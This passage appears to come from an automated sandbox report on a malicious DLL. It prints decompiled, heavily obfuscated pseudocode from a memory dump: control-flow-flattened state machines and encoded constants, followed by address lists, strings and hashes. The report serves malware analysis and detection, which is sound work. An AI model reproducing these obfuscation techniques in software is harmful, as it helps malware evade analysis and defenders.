				_t325 = 0x61;
				_v100 = _v100 * 0x3c;
				_v100 = _v100 + 0xfcb7;
				_v100 = _v100 + 0x291b;
				_v100 = _v100 ^ 0x003438e8;
				_v16 = 0xbc77;
				_v16 = _v16 / _t325;
				_v16 = _v16 ^ 0x00000ba9;
				_v20 = 0x551b;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x00003a10;
				_v72 = 0xf55d;
				_t326 = 0x77;
				_v72 = _v72 * 0x43;
				_v72 = _v72 << 4;
				_v72 = _v72 ^ 0x04035a3d;
				_v120 = 0xb90c;
				_v120 = _v120 + 0xd659;
				_v120 = _v120 ^ 0xfcb912ce;
				_v120 = _v120 + 0xffffd5f3;
				_v120 = _v120 ^ 0xfcb87f3f;
				_v124 = 0xc5f5;
				_v124 = _v124 + 0xffff38c4;
				_v124 = _v124 + 0xffff8ee2;
				_v124 = _v124 + 0xbcea;
				_v124 = _v124 ^ 0x0000272d;
				_v48 = 0x45f8;
				_v48 = _v48 >> 9;
				_v48 = _v48 ^ 0x00001bf9;
				_v52 = 0x32c2;
				_v52 = _v52 / _t326;
				_v52 = _v52 ^ 0x00000062;
				_v56 = 0xc8ea;
				_v56 = _v56 << 2;
				_v56 = _v56 ^ 0x00036276;
				_v60 = 0x3678;
				_v60 = _v60 + 0xffff827e;
				_v60 = _v60 ^ 0xffff9e92;
				_v128 = 0x4315;
				_v128 = _v128 + 0x17d5;
				_v128 = _v128 + 0x7b4b;
				_t327 = 0x66;
				_v128 = _v128 / _t327;
				_v128 = _v128 ^ 0x000052b0;
				_v84 = 0xff10;
				_v84 = _v84 >> 6;
				_v84 = _v84 ^ 0xe74df868;
				_v84 = _v84 ^ 0xe74da55b;
				_v4 = 0x9fbe;
				_v4 = _v4 ^ 0x0f0cff04;
				_v4 = _v4 ^ 0x0f0c1c1b;
				_v8 = 0xca50;
				_t328 = 0x50;
				_v8 = _v8 / _t328;
				_v8 = _v8 ^ 0x00005097;
				_v64 = 0x27da;
				_v64 = _v64 << 7;
				_v64 = _v64 + 0xffff7471;
				_v64 = _v64 ^ 0x0013574b;
				_v12 = 0x5a13;
				_v12 = _v12 | 0xbd758947;
				_v12 = _v12 ^ 0xbd75dfd8;
				goto L1;
				do {
					while(1) {
						L1:
						_t359 = _t349 - 0x22d6be69;
						if(_t359 > 0) {
							break;
						}
						if(_t359 == 0) {
							_t306 = E1001814A();
							_t351 = _t351 - 0xc + 0xc;
							_t349 = 0x29061ad6;
							_t348 = _t348 + _t306;
							continue;
						} else {
							if(_t349 == 0xac2acfd) {
								_t308 = E100116E3(_v120, _v124, _v48, _t321 + 0x18, _v52);
								_t351 =  &(_t351[3]);
								_t349 = 0xef0c238;
								_t348 = _t348 + _t308;
								continue;
							} else {
								if(_t349 == 0xda5b1a7) {
									_t348 = _t348 + E1001814A();
								} else {
									if(_t349 == 0xef0c238) {
										_t315 = E100116E3(_v56, _v60, _v128, _t321 + 0x20, _v84);
										_t351 =  &(_t351[3]);
										_t349 = 0xda5b1a7;
										_t348 = _t348 + _t315;
										continue;
									} else {
										if(_t349 != 0xf00eebf) {
											goto L19;
										} else {
											_t349 = 0x36d68276;
											continue;
										}
									}
								}
							}
						}
						L22:
						return _t348;
					}
					if(_t349 == 0x28da49a7) {
						_t295 = E1001814A();
						_t351 = _t351 - 0xc + 0xc;
						_t349 = 0x397170bf;
						_t348 = _t348 + _t295;
						goto L19;
					} else {
						if(_t349 == 0x29061ad6) {
							_t300 = E1001814A();
							_t351 = _t351 - 0xc + 0xc;
							_t349 = 0xac2acfd;
							_t348 = _t348 + _t300;
							goto L1;
						} else {
							if(_t349 == 0x36d68276) {
								_t301 = E100116E3(_v24, _v76, _v28, _t321, _v32);
								_t351 =  &(_t351[3]);
								_t349 = 0x28da49a7;
								_t348 = _t348 + _t301;
								goto L1;
							} else {
								if(_t349 != 0x397170bf) {
									goto L19;
								} else {
									_t320 = E1001814A();
									_t351 = _t351 - 0xc + 0xc;
									_t349 = 0x22d6be69;
									_t348 = _t348 + _t320;
									goto L1;
								}
							}
						}
					}
					goto L22;
					L19:
				} while (_t349 != 0x2172d3f8);
				goto L22;
			}

0x10007306
0x1000730c
0x10007316
0x1000731b
0x10007323
0x1000732b
0x1000733d
0x1000733f
0x10007341
0x10007346
0x1000734c
0x10007354
0x10007359
0x10007361
0x10007366
0x1000736e
0x10007376
0x1000737b
0x10007383
0x1000738b
0x10007394
0x10007397
0x1000739b
0x100073a3
0x100073ab
0x100073b3
0x100073b8
0x100073c0
0x100073c8
0x100073d0
0x100073d8
0x100073e0
0x100073e8
0x100073f0
0x100073f8
0x10007400
0x10007408
0x10007410
0x10007418
0x10007420
0x10007428
0x10007430
0x10007438
0x10007440
0x10007448
0x10007450
0x10007458
0x10007460
0x10007465
0x1000746d
0x10007475
0x10007482
0x10007486
0x1000748e
0x10007496
0x1000749e
0x100074a8
0x100074ac
0x100074b1
0x100074b9
0x100074c1
0x100074c9
0x100074ce
0x100074d6
0x100074de
0x100074e6
0x100074ee
0x100074f6
0x100074fe
0x10007505
0x1000750a
0x10007512
0x10007521
0x10007524
0x10007528
0x10007530
0x10007538
0x10007540
0x10007556
0x1000755d
0x10007568
0x10007573
0x1000757b
0x10007586
0x10007593
0x10007596
0x1000759a
0x1000759f
0x100075a7
0x100075af
0x100075b7
0x100075bf
0x100075c7
0x100075cf
0x100075d7
0x100075df
0x100075e7
0x100075ef
0x100075f7
0x100075ff
0x10007604
0x1000760c
0x1000761c
0x10007620
0x10007625
0x1000762d
0x10007632
0x1000763a
0x10007642
0x1000764a
0x10007652
0x1000765a
0x10007662
0x1000766e
0x10007673
0x10007679
0x10007681
0x10007689
0x1000768e
0x10007696
0x1000769e
0x100076a9
0x100076b4
0x100076bf
0x100076d1
0x100076d4
0x100076db
0x100076e6
0x100076ee
0x100076f3
0x100076fb
0x10007703
0x10007713
0x1000771e
0x1000771e
0x10007729
0x10007729
0x10007729
0x10007729
0x1000772b
0x00000000
0x00000000
0x10007731
0x100077c2
0x100077c7
0x100077ca
0x100077cf
0x00000000
0x10007733
0x10007739
0x1000779b
0x100077a0
0x100077a3
0x100077a8
0x00000000
0x1000773b
0x10007741
0x100078cb
0x10007747
0x1000774d
0x10007776
0x1000777b
0x1000777e
0x10007783
0x00000000
0x1000774f
0x10007755
0x00000000
0x1000775b
0x1000775b
0x00000000
0x1000775b
0x10007755
0x1000774d
0x10007741
0x10007739
0x100078cd
0x100078d9
0x100078d9
0x100077dc
0x1000788a
0x1000788f
0x10007892
0x10007897
0x00000000
0x100077e2
0x100077e8
0x10007863
0x10007868
0x1000786b
0x10007870
0x00000000
0x100077ea
0x100077f0
0x10007836
0x1000783b
0x1000783e
0x10007843
0x00000000
0x100077f2
0x100077f8
0x00000000
0x100077fe
0x10007811
0x10007816
0x10007819
0x1000781b
0x00000000
0x1000781b
0x100077f8
0x100077f0
0x100077e8
0x00000000
0x10007899
0x10007899
0x00000000

Strings

b, xrefs: 10007620
x6, xrefs: 1000763A
K{, xrefs: 10007662
^u:, xrefs: 100074CE
L, xrefs: 10007448
-', xrefs: 100075EF
![, xrefs: 10007496
M, xrefs: 100073D0
84, xrefs: 10007538

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ![$-'$K{$L$^u:$b$x6$84$M
API String ID: 0-2099710246
Opcode ID: 008a80f03873ded7cfbb1931598d7a04c5d4679916d579fce4a4a6c9e9ad7482
Instruction ID: 8dc089cbb54495dc3f330e26539778bf82ec73b9a70aa2b56535661c3a61ba02
Opcode Fuzzy Hash: 008a80f03873ded7cfbb1931598d7a04c5d4679916d579fce4a4a6c9e9ad7482
Instruction Fuzzy Hash: 6DD124729087418FE3A4CF25C48950BBBE1FBC4388F108A1DF5D9962A0D7B99949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000EBA4, Relevance: 11.5, Strings: 9, Instructions: 275
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1000EBA4(void* __ecx, void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t227;
				signed int _t260;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t273;
				signed int* _t305;
				intOrPtr _t306;
				signed int* _t309;
				void* _t312;

				_t306 = _a12;
				_t305 = _a8;
				_push(_t306);
				_push(_t305);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t227);
				_v96 = 0xad;
				_t309 =  &(( &_v160)[5]);
				_v96 = _v96 + 0xffff4d02;
				_v96 = _v96 ^ 0xffff5955;
				_t273 = 0x337094a1;
				_v116 = 0x943d;
				_v116 = _v116 << 0xc;
				_v116 = _v116 << 3;
				_v116 = _v116 ^ 0x4a1e94ff;
				_v160 = 0x8b5;
				_v160 = _v160 + 0x6659;
				_v160 = _v160 | 0x7c73aeae;
				_v160 = _v160 << 3;
				_v160 = _v160 ^ 0xe39f69f8;
				_v108 = 0xce0;
				_t267 = 9;
				_v108 = _v108 * 0x52;
				_v108 = _v108 ^ 0x597e8392;
				_v108 = _v108 ^ 0x597a8e41;
				_v140 = 0xd853;
				_v140 = _v140 + 0xddda;
				_v140 = _v140 + 0xffffe664;
				_v140 = _v140 + 0x72bd;
				_v140 = _v140 ^ 0x00021417;
				_v112 = 0x65a8;
				_v112 = _v112 ^ 0x7d3ec54a;
				_v112 = _v112 << 0xc;
				_v112 = _v112 ^ 0xea0e4d27;
				_v104 = 0x416f;
				_v104 = _v104 | 0xbe5d5e2e;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x000b90cd;
				_v136 = 0xa653;
				_v136 = _v136 >> 6;
				_v136 = _v136 / _t267;
				_t268 = 0x32;
				_v136 = _v136 / _t268;
				_v136 = _v136 ^ 0x00006385;
				_v92 = 0x4be;
				_v92 = _v92 >> 4;
				_v92 = _v92 ^ 0x00006b48;
				_v120 = 0x8c1d;
				_t269 = 0x22;
				_v120 = _v120 * 0x67;
				_v120 = _v120 / _t269;
				_v120 = _v120 ^ 0xa7356ca7;
				_v120 = _v120 ^ 0xa734f178;
				_v128 = 0xea45;
				_v128 = _v128 + 0xffff0452;
				_v128 = _v128 * 0x70;
				_v128 = _v128 | 0xf22de99a;
				_v128 = _v128 ^ 0xfffdaea4;
				_v144 = 0x24b1;
				_v144 = _v144 * 0x16;
				_v144 = _v144 >> 9;
				_v144 = _v144 + 0xffff3ce1;
				_v144 = _v144 ^ 0xffff1950;
				_v152 = 0x5c3d;
				_t270 = 0x36;
				_v152 = _v152 / _t270;
				_v152 = _v152 << 9;
				_v152 = _v152 << 0xe;
				_v152 = _v152 ^ 0xda801669;
				_v156 = 0x1c06;
				_v156 = _v156 >> 2;
				_v156 = _v156 | 0xeff4e58c;
				_v156 = _v156 << 7;
				_v156 = _v156 ^ 0xfa73a590;
				_v76 = 0xbfb0;
				_v76 = _v76 | 0x4b602068;
				_v76 = _v76 ^ 0x4b60ca9d;
				_v148 = 0xc661;
				_v148 = _v148 | 0x0ce868ca;
				_v148 = _v148 >> 7;
				_v148 = _v148 + 0x4d2c;
				_v148 = _v148 ^ 0x001a72c2;
				_v124 = 0x928e;
				_v124 = _v124 + 0xffffca73;
				_v124 = _v124 << 3;
				_v124 = _v124 ^ 0x2d9456a7;
				_v124 = _v124 ^ 0x2d96915e;
				_v84 = 0x4954;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x00007e6a;
				_v132 = 0x5e5a;
				_v132 = _v132 ^ 0xf093358b;
				_v132 = _v132 + 0x834c;
				_v132 = _v132 + 0x6b06;
				_v132 = _v132 ^ 0xf0940b45;
				_v80 = 0x470c;
				_v80 = _v80 ^ 0x6caa6849;
				_v80 = _v80 ^ 0x6caa3913;
				_v88 = 0x6cc8;
				_v88 = _v88 * 0x2d;
				_v88 = _v88 ^ 0x001340da;
				_v100 = 0xb6d8;
				_v100 = _v100 * 0x67;
				_v100 = _v100 * 0x47;
				_v100 = _v100 ^ 0x14673058;
				goto L1;
				do {
					while(1) {
						L1:
						_t312 = _t273 - 0x2f873b08;
						if(_t312 > 0) {
							break;
						}
						if(_t312 == 0) {
							E1001160B(_v80,  *((intOrPtr*)(_t306 + 0x28)), _v88,  &_v72);
						} else {
							if(_t273 == 0x2924432) {
								E1001BC32( &_v72, _v160, _t305, _v108, _v140);
								_t309 =  &(_t309[3]);
								_t273 = 0x9e911b1;
								continue;
							} else {
								if(_t273 == 0x40b264a) {
									_t304 = _v84;
									E1001894D( &_v72, _v84, __eflags, _v132, _t306 + 0x20);
									_t273 = 0x2f873b08;
									continue;
								} else {
									if(_t273 == 0x9e911b1) {
										_t304 = _v112;
										E1001894D( &_v72, _v112, __eflags, _v104, _t306);
										_t273 = 0x38d56101;
										continue;
									} else {
										if(_t273 == 0x109e52b3) {
											_push(_t273);
											_t260 = E1000A0AD(_t305[1], _t304);
											 *_t305 = _t260;
											__eflags = _t260;
											if(__eflags != 0) {
												_t273 = 0x2924432;
												continue;
											}
										} else {
											if(_t273 == 0x10dbf6d8) {
												_t304 = _v148;
												E1001894D( &_v72, _v148, __eflags, _v124, _t306 + 0x18);
												_t273 = 0x40b264a;
												continue;
											} else {
												if(_t273 != 0x2d108e66) {
													goto L26;
												} else {
													_t304 =  *((intOrPtr*)(_t306 + 0x14));
													E1001160B(_v156,  *((intOrPtr*)(_t306 + 0x14)), _v76,  &_v72);
													_t309 =  &(_t309[2]);
													_t273 = 0x10dbf6d8;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags =  *_t305;
						_t226 =  *_t305 != 0;
						__eflags = _t226;
						return 0 | _t226;
					}
					__eflags = _t273 - 0x30bfd23e;
					if(_t273 == 0x30bfd23e) {
						E1001160B(_v120,  *((intOrPtr*)(_t306 + 0xc)), _v128,  &_v72);
						_t309 =  &(_t309[2]);
						_t273 = 0x3b7f4642;
						goto L26;
					} else {
						__eflags = _t273 - 0x337094a1;
						if(__eflags == 0) {
							_t273 = 0x3449fd91;
							 *_t305 =  *_t305 & 0x00000000;
							_t305[1] = _v100;
							goto L1;
						} else {
							__eflags = _t273 - 0x3449fd91;
							if(_t273 == 0x3449fd91) {
								_t305[1] = E10007306(_t306);
								_t273 = 0x109e52b3;
								goto L1;
							} else {
								__eflags = _t273 - 0x38d56101;
								if(_t273 == 0x38d56101) {
									_t304 =  *((intOrPtr*)(_t306 + 8));
									E1001160B(_v136,  *((intOrPtr*)(_t306 + 8)), _v92,  &_v72);
									_t309 =  &(_t309[2]);
									_t273 = 0x30bfd23e;
									goto L1;
								} else {
									__eflags = _t273 - 0x3b7f4642;
									if(_t273 != 0x3b7f4642) {
										goto L26;
									} else {
										_t304 =  *((intOrPtr*)(_t306 + 0x10));
										E1001160B(_v144,  *((intOrPtr*)(_t306 + 0x10)), _v152,  &_v72);
										_t309 =  &(_t309[2]);
										_t273 = 0x2d108e66;
										goto L1;
									}
								}
							}
						}
					}
					goto L29;
					L26:
					__eflags = _t273 - 0x1903751d;
				} while (__eflags != 0);
				goto L29;
			}

0x1000ebad
0x1000ebb5
0x1000ebbc
0x1000ebbd
0x1000ebbe
0x1000ebc5
0x1000ebc6
0x1000ebc7
0x1000ebcc
0x1000ebd4
0x1000ebd7
0x1000ebe1
0x1000ebe9
0x1000ebee
0x1000ebf6
0x1000ebfb
0x1000ec00
0x1000ec08
0x1000ec10
0x1000ec18
0x1000ec20
0x1000ec25
0x1000ec2d
0x1000ec3c
0x1000ec3f
0x1000ec43
0x1000ec4b
0x1000ec53
0x1000ec5b
0x1000ec63
0x1000ec6b
0x1000ec73
0x1000ec7b
0x1000ec83
0x1000ec8b
0x1000ec90
0x1000ec98
0x1000eca0
0x1000eca8
0x1000ecad
0x1000ecb5
0x1000ecbd
0x1000ecca
0x1000ecd2
0x1000ecd7
0x1000ecdd
0x1000ece5
0x1000eced
0x1000ecf2
0x1000ecfa
0x1000ed07
0x1000ed08
0x1000ed12
0x1000ed16
0x1000ed1e
0x1000ed26
0x1000ed2e
0x1000ed3b
0x1000ed3f
0x1000ed47
0x1000ed4f
0x1000ed5c
0x1000ed62
0x1000ed6c
0x1000ed74
0x1000ed7c
0x1000ed8a
0x1000ed92
0x1000ed96
0x1000ed9b
0x1000eda0
0x1000eda8
0x1000edb0
0x1000edb5
0x1000edbd
0x1000edc2
0x1000edca
0x1000edd2
0x1000edda
0x1000ede2
0x1000edea
0x1000edf2
0x1000edf7
0x1000edff
0x1000ee07
0x1000ee0f
0x1000ee17
0x1000ee1c
0x1000ee24
0x1000ee2c
0x1000ee34
0x1000ee39
0x1000ee41
0x1000ee49
0x1000ee51
0x1000ee59
0x1000ee61
0x1000ee69
0x1000ee71
0x1000ee79
0x1000ee81
0x1000ee8e
0x1000ee92
0x1000ee9a
0x1000eea7
0x1000eeb0
0x1000eeb4
0x1000eeb4
0x1000eebc
0x1000eebc
0x1000eebc
0x1000eebc
0x1000eebe
0x00000000
0x00000000
0x1000eec4
0x1000f09b
0x1000eeca
0x1000eecc
0x1000efb2
0x1000efb7
0x1000efba
0x00000000
0x1000eed2
0x1000eed8
0x1000ef8b
0x1000ef93
0x1000ef9a
0x00000000
0x1000eede
0x1000eee4
0x1000ef6a
0x1000ef72
0x1000ef79
0x00000000
0x1000eee6
0x1000eeec
0x1000ef4a
0x1000ef4e
0x1000ef53
0x1000ef56
0x1000ef58
0x1000ef5e
0x00000000
0x1000ef5e
0x1000eeee
0x1000eef4
0x1000ef29
0x1000ef31
0x1000ef38
0x00000000
0x1000eef6
0x1000eefc
0x00000000
0x1000ef02
0x1000ef0b
0x1000ef12
0x1000ef17
0x1000ef1a
0x00000000
0x1000ef1a
0x1000eefc
0x1000eef4
0x1000eeec
0x1000eee4
0x1000eed8
0x1000eecc
0x1000f0a3
0x1000f0a5
0x1000f0aa
0x1000f0aa
0x1000f0b4
0x1000f0b4
0x1000efc4
0x1000efca
0x1000f070
0x1000f075
0x1000f078
0x00000000
0x1000efd0
0x1000efd0
0x1000efd6
0x1000f050
0x1000f055
0x1000f058
0x00000000
0x1000efd8
0x1000efd8
0x1000efde
0x1000f03f
0x1000f042
0x00000000
0x1000efe0
0x1000efe0
0x1000efe6
0x1000f01f
0x1000f026
0x1000f02b
0x1000f02e
0x00000000
0x1000efe8
0x1000efe8
0x1000efee
0x00000000
0x1000eff4
0x1000effd
0x1000f004
0x1000f009
0x1000f00c
0x00000000
0x1000f00c
0x1000efee
0x1000efe6
0x1000efde
0x1000efd6
0x00000000
0x1000f07d
0x1000f07d
0x1000f07d
0x00000000

Strings

j~, xrefs: 1000EE39
h `K, xrefs: 1000EDD2
E, xrefs: 1000ED26
Z^, xrefs: 1000EE41
=\, xrefs: 1000ED7C
Yf, xrefs: 1000EC10
,M, xrefs: 1000EDF7
oA, xrefs: 1000EC98
Hk, xrefs: 1000ECF2

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,M$=\$E$Hk$Yf$Z^$h `K$j~$oA
API String ID: 0-693924685
Opcode ID: 1bffc10bec51c740af9c62bc7d531a766bacedf1785e94121b55c9f4d6615e87
Instruction ID: 651fbafa09fb64e4418ccd52b02699b6508c8dcf185b2773030faa9ed007501e
Opcode Fuzzy Hash: 1bffc10bec51c740af9c62bc7d531a766bacedf1785e94121b55c9f4d6615e87
Instruction Fuzzy Hash: 88C132715083819FE358CE21C48982BFBE1FB84388F60891DF596962A4D776DA49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001197B, Relevance: 11.5, Strings: 9, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E1001197B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				char _t242;
				void* _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				void* _t281;
				void* _t282;
				void* _t313;
				intOrPtr _t314;
				signed int _t315;
				signed int* _t318;

				_push(_a28);
				_t313 = __ecx;
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				_t242 = E10017B8C(0);
				_v72 = _t242;
				_t314 = _t242;
				_v88 = 0x5264;
				_t318 =  &(( &_v168)[9]);
				_t281 = 0x2db95f3e;
				_t272 = 0x11;
				_v88 = _v88 * 0x1e;
				_v88 = _v88 ^ 0x0009a3b8;
				_v164 = 0x78f0;
				_v164 = _v164 ^ 0xe251e286;
				_v164 = _v164 << 6;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 ^ 0x00128cf3;
				_v104 = 0x75ac;
				_v104 = _v104 + 0xffff0e05;
				_v104 = _v104 | 0x929729c6;
				_v104 = _v104 ^ 0xffffc00a;
				_v136 = 0xe5de;
				_v136 = _v136 >> 1;
				_v136 = _v136 + 0xffff121a;
				_v136 = _v136 ^ 0xffffd1a8;
				_v132 = 0xd315;
				_v132 = _v132 / _t272;
				_v132 = _v132 + 0xe3de;
				_v132 = _v132 ^ 0x00009b82;
				_v100 = 0xd4a4;
				_v100 = _v100 + 0xffff961d;
				_v100 = _v100 ^ 0x000079dd;
				_v152 = 0xacb7;
				_v152 = _v152 | 0x9e581334;
				_t273 = 0x68;
				_v152 = _v152 * 0x26;
				_v152 = _v152 >> 0x10;
				_v152 = _v152 ^ 0x00008329;
				_v168 = 0xd8cd;
				_v168 = _v168 + 0x4fed;
				_v168 = _v168 | 0xa1789196;
				_v168 = _v168 / _t273;
				_v168 = _v168 ^ 0x018d3312;
				_v160 = 0xa530;
				_v160 = _v160 | 0x9fe367d0;
				_v160 = _v160 >> 0xb;
				_v160 = _v160 + 0xffffe95b;
				_v160 = _v160 ^ 0x0013bc73;
				_v80 = 0x9b46;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00002ef9;
				_v116 = 0xf667;
				_v116 = _v116 | 0x6703157e;
				_v116 = _v116 ^ 0xdac05cf0;
				_v116 = _v116 ^ 0xbdc3d4f3;
				_v120 = 0xe240;
				_t274 = 0xf;
				_v120 = _v120 / _t274;
				_v120 = _v120 ^ 0x7c8e3fb5;
				_v120 = _v120 ^ 0x7c8e1b0d;
				_v128 = 0xf79b;
				_t315 = 6;
				_v128 = _v128 / _t315;
				_v128 = _v128 + 0xffffda43;
				_v128 = _v128 ^ 0x00003f47;
				_v144 = 0xd194;
				_t275 = 0x6f;
				_v144 = _v144 / _t275;
				_t276 = 0x38;
				_v144 = _v144 / _t276;
				_v144 = _v144 ^ 0x00007906;
				_v108 = 0xc8b5;
				_v108 = _v108 << 7;
				_t277 = 0x64;
				_v108 = _v108 / _t277;
				_v108 = _v108 ^ 0x0001306c;
				_v124 = 0x57a8;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 | 0xace08fa8;
				_v124 = _v124 ^ 0xace08fa2;
				_v96 = 0xb5fb;
				_v96 = _v96 / _t315;
				_v96 = _v96 ^ 0x00007bdd;
				_v76 = 0xf74f;
				_v76 = _v76 + 0x77bd;
				_v76 = _v76 ^ 0x00017a30;
				_v148 = 0xce6;
				_v148 = _v148 >> 2;
				_v148 = _v148 + 0xffff9fa6;
				_v148 = _v148 ^ 0x2166ece8;
				_v148 = _v148 ^ 0xde991af7;
				_v156 = 0x8b4b;
				_v156 = _v156 << 1;
				_v156 = _v156 ^ 0x501e0804;
				_v156 = _v156 >> 5;
				_v156 = _v156 ^ 0x0280dfae;
				_v92 = 0x733e;
				_t278 = 0x2a;
				_v92 = _v92 / _t278;
				_v92 = _v92 ^ 0x00007e97;
				_v112 = 0x35e0;
				_v112 = _v112 + 0xffffcb10;
				_v112 = _v112 + 0xffff195d;
				_v112 = _v112 ^ 0xffff7c1f;
				_v84 = 0xebf3;
				_v84 = _v84 | 0xd0a79921;
				_v84 = _v84 ^ 0xd0a78d64;
				_v140 = 0xdd0e;
				_v140 = _v140 | 0xffb9ffaf;
				_v140 = _v140 ^ 0xffb9e491;
				while(_t281 != 0x1495af46) {
					if(_t281 == 0x17ecf874) {
						E1001BC5B(_v84, _v72, _v140);
					} else {
						if(_t281 == 0x2db95f3e) {
							_t281 = 0x35fad8c3;
							continue;
						} else {
							if(_t281 != 0x35fad8c3) {
								L9:
								__eflags = _t281 - 0x35092c54;
								if(_t281 != 0x35092c54) {
									continue;
								} else {
								}
							} else {
								_t271 = E10013CF8(_v104,  &_v72, _v136, _v132, _t281, _t313);
								_t318 =  &(_t318[4]);
								if(_t271 != 0) {
									_t281 = 0x1495af46;
									continue;
								}
							}
						}
					}
					return _t314;
				}
				_push(_v152);
				_push(_v100);
				_t282 = 0x44;
				E1001A68F(_t282,  &_v68);
				_push(_v116);
				_v68 = 0x44;
				_push(_v80);
				_push(_v160);
				_v60 = E1000B871(0x10001000, _v168, __eflags);
				__eflags = _v164 | _v88;
				_t314 = E1001188B( &_v68, 0x10001000, _v120, _v128, 0, _a8, 0x10001000, _v144, _v72, 0x10001000, _t313, _v108, _v124, _v96, _a4, _v76, _v164 | _v88);
				E1000717B(_v148, _v156, _v92, _v60, _v112);
				_t318 =  &(_t318[0x18]);
				_t281 = 0x17ecf874;
				goto L9;
			}

0x10011985
0x1001198e
0x10011990
0x10011991
0x10011992
0x10011999
0x100119a0
0x100119a7
0x100119ae
0x100119af
0x100119b0
0x100119b5
0x100119bc
0x100119be
0x100119c9
0x100119d3
0x100119da
0x100119db
0x100119df
0x100119e7
0x100119ef
0x100119f7
0x100119fc
0x10011a01
0x10011a09
0x10011a11
0x10011a19
0x10011a21
0x10011a29
0x10011a31
0x10011a35
0x10011a3d
0x10011a45
0x10011a55
0x10011a5b
0x10011a63
0x10011a6b
0x10011a73
0x10011a7b
0x10011a83
0x10011a8b
0x10011a98
0x10011a9b
0x10011a9f
0x10011aa4
0x10011aac
0x10011ab4
0x10011abc
0x10011aca
0x10011ace
0x10011ad6
0x10011ade
0x10011ae6
0x10011aeb
0x10011af3
0x10011afb
0x10011b03
0x10011b08
0x10011b10
0x10011b18
0x10011b20
0x10011b28
0x10011b32
0x10011b3e
0x10011b43
0x10011b47
0x10011b4f
0x10011b57
0x10011b65
0x10011b6a
0x10011b6e
0x10011b76
0x10011b7e
0x10011b8c
0x10011b91
0x10011b9b
0x10011ba0
0x10011ba4
0x10011bac
0x10011bb4
0x10011bbf
0x10011bc4
0x10011bc8
0x10011bd0
0x10011bd8
0x10011bdd
0x10011be5
0x10011bed
0x10011bfd
0x10011c03
0x10011c10
0x10011c18
0x10011c20
0x10011c28
0x10011c30
0x10011c35
0x10011c3d
0x10011c45
0x10011c4d
0x10011c55
0x10011c59
0x10011c61
0x10011c66
0x10011c6e
0x10011c7a
0x10011c82
0x10011c86
0x10011c8e
0x10011c96
0x10011c9e
0x10011ca6
0x10011cae
0x10011cb6
0x10011cbe
0x10011cc6
0x10011cce
0x10011cd6
0x10011cde
0x10011ce8
0x10011dfa
0x10011cee
0x10011cf4
0x10011d24
0x00000000
0x10011cf6
0x10011cf8
0x10011de0
0x10011de0
0x10011de6
0x00000000
0x00000000
0x10011dec
0x10011cfe
0x10011d10
0x10011d15
0x10011d1a
0x10011d20
0x00000000
0x10011d20
0x10011d1a
0x10011cf8
0x10011cf4
0x10011e0c
0x10011e0c
0x10011d28
0x10011d30
0x10011d36
0x10011d37
0x10011d3c
0x10011d45
0x10011d50
0x10011d54
0x10011d64
0x10011d6c
0x10011dbb
0x10011dd3
0x10011dd8
0x10011ddb
0x00000000

Strings

@, xrefs: 10011B32
f!, xrefs: 10011C3D
G?, xrefs: 10011B76
>s, xrefs: 10011C6E
5, xrefs: 10011C8E
dR, xrefs: 100119BE
O, xrefs: 10011AB4
T,5, xrefs: 10011DE0
D, xrefs: 10011D45

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: >s$@$D$G?$T,5$dR$5$O$f!
API String ID: 0-2375948987
Opcode ID: b61ea4cf5397b2b2c19f2a3a7c23ca40aa1988279481e7acaa0648667e7a303d
Instruction ID: 7079f3ce745caa60ee96d667854c2f084f9711300b65e3cbddd062a487d0cf44
